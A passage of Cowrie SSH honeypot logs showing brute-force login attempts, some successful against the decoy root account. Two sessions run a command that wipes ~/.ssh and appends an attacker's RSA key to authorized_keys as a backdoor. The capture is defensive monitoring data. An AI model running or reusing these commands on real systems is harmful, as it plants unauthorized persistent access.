o-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:07:44.457673Z","src_ip":"152.32.190.168","session":"a4c866393f48"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"nginx@2025","message":"login attempt [nginx/nginx@2025] failed","sensor":"my-vps","timestamp":"2025-09-09T04:07:44.573557Z","src_ip":"211.22.25.164","session":"3e64a772c44b"}
{"eventid":"cowrie.login.failed","username":"kevin","password":"kevin123","message":"login attempt [kevin/kevin123] failed","sensor":"my-vps","timestamp":"2025-09-09T04:07:45.528911Z","src_ip":"152.32.190.168","session":"a4c866393f48"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:07:45.815369Z","src_ip":"211.22.25.164","session":"3e64a772c44b"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:07:46.788380Z","src_ip":"152.32.190.168","session":"a4c866393f48"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":50846,"dst_ip":"1.2.3.4","dst_port":22,"session":"2dd7c7016550","protocol":"ssh","message":"New connection: 51.81.118.153:50846 (1.2.3.4:22) [session: 2dd7c7016550]","sensor":"my-vps","timestamp":"2025-09-09T04:07:55.096833Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:07:55.097583Z","src_ip":"51.81.118.153","session":"2dd7c7016550"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:07:55.194175Z","src_ip":"51.81.118.153","session":"2dd7c7016550"}
{"eventid":"cowrie.login.failed","username":"zs","password":"123","message":"login attempt [zs/123] failed","sensor":"my-vps","timestamp":"2025-09-09T04:07:55.616511Z","src_ip":"51.81.118.153","session":"2dd7c7016550"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:07:56.714064Z","src_ip":"51.81.118.153","session":"2dd7c7016550"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":50610,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e60a737119b","protocol":"ssh","message":"New connection: 192.210.135.20:50610 (1.2.3.4:22) [session: 3e60a737119b]","sensor":"my-vps","timestamp":"2025-09-09T04:07:57.237011Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:07:57.237646Z","src_ip":"192.210.135.20","session":"3e60a737119b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:07:57.347189Z","src_ip":"192.210.135.20","session":"3e60a737119b"}
{"eventid":"cowrie.login.success","username":"root","password":"Welcome_1","message":"login attempt [root/Welcome_1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:07:57.827811Z","src_ip":"192.210.135.20","session":"3e60a737119b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:07:58.103964Z","src_ip":"192.210.135.20","session":"3e60a737119b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:07:58.104623Z","src_ip":"192.210.135.20","session":"3e60a737119b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:07:58.105386Z","src_ip":"192.210.135.20","session":"3e60a737119b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:07:58.215811Z","src_ip":"192.210.135.20","session":"3e60a737119b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:07:58.452037Z","src_ip":"192.210.135.20","session":"3e60a737119b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:07:58.452715Z","src_ip":"192.210.135.20","session":"3e60a737119b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:07:58.564132Z","src_ip":"192.210.135.20","session":"3e60a737119b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:07:58.564993Z","src_ip":"192.210.135.20","session":"3e60a737119b"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":52028,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a208b50439f","protocol":"ssh","message":"New connection: 192.210.135.20:52028 (1.2.3.4:22) [session: 3a208b50439f]","sensor":"my-vps","timestamp":"2025-09-09T04:07:58.671863Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:07:58.672651Z","src_ip":"192.210.135.20","session":"3a208b50439f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:07:58.781718Z","src_ip":"192.210.135.20","session":"3a208b50439f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:07:59.257991Z","src_ip":"192.210.135.20","session":"3a208b50439f"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:08:00.369220Z","src_ip":"192.210.135.20","session":"3a208b50439f"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":52752,"dst_ip":"1.2.3.4","dst_port":22,"session":"2c2061883e97","protocol":"ssh","message":"New connection: 192.210.135.20:52752 (1.2.3.4:22) [session: 2c2061883e97]","sensor":"my-vps","timestamp":"2025-09-09T04:08:00.478092Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:08:00.478736Z","src_ip":"192.210.135.20","session":"2c2061883e97"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:08:00.588246Z","src_ip":"192.210.135.20","session":"2c2061883e97"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:08:01.068389Z","src_ip":"192.210.135.20","session":"2c2061883e97"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:08:01.179662Z","src_ip":"192.210.135.20","session":"3e60a737119b"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:08:01.180658Z","src_ip":"192.210.135.20","session":"2c2061883e97"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.55","src_port":38627,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f3756d49cf2","protocol":"ssh","message":"New connection: 154.209.4.55:38627 (1.2.3.4:22) [session: 1f3756d49cf2]","sensor":"my-vps","timestamp":"2025-09-09T04:08:12.545049Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:08:12.554140Z","src_ip":"154.209.4.55","session":"1f3756d49cf2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:08:12.764053Z","src_ip":"154.209.4.55","session":"1f3756d49cf2"}
{"eventid":"cowrie.login.failed","username":"hacker","password":"123456","message":"login attempt [hacker/123456] failed","sensor":"my-vps","timestamp":"2025-09-09T04:08:13.613155Z","src_ip":"154.209.4.55","session":"1f3756d49cf2"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:08:14.826591Z","src_ip":"154.209.4.55","session":"1f3756d49cf2"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:08:31.125778Z","src_ip":"212.227.235.229","session":"3a4e8a1d7aba"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.95.12","src_port":43686,"dst_ip":"1.2.3.4","dst_port":22,"session":"59de1e0d8bc4","protocol":"ssh","message":"New connection: 103.59.95.12:43686 (1.2.3.4:22) [session: 59de1e0d8bc4]","sensor":"my-vps","timestamp":"2025-09-09T04:08:31.349246Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:08:31.350637Z","src_ip":"103.59.95.12","session":"59de1e0d8bc4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:08:31.611859Z","src_ip":"103.59.95.12","session":"59de1e0d8bc4"}
{"eventid":"cowrie.login.success","username":"root","password":"manager","message":"login attempt [root/manager] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:08:32.689151Z","src_ip":"103.59.95.12","session":"59de1e0d8bc4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:08:33.968028Z","src_ip":"103.59.95.12","session":"59de1e0d8bc4"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:08:33.968944Z","src_ip":"103.59.95.12","session":"59de1e0d8bc4"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:08:33.970333Z","src_ip":"103.59.95.12","session":"59de1e0d8bc4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:08:34.228683Z","src_ip":"103.59.95.12","session":"59de1e0d8bc4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:08:34.763459Z","src_ip":"103.59.95.12","session":"59de1e0d8bc4"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:08:34.764118Z","src_ip":"103.59.95.12","session":"59de1e0d8bc4"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:08:35.023729Z","src_ip":"103.59.95.12","session":"59de1e0d8bc4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:08:35.024708Z","src_ip":"103.59.95.12","session":"59de1e0d8bc4"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.95.12","src_port":43698,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d9ae8366e91","protocol":"ssh","message":"New connection: 103.59.95.12:43698 (1.2.3.4:22) [session: 7d9ae8366e91]","sensor":"my-vps","timestamp":"2025-09-09T04:08:35.302799Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:08:35.303754Z","src_ip":"103.59.95.12","session":"7d9ae8366e91"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-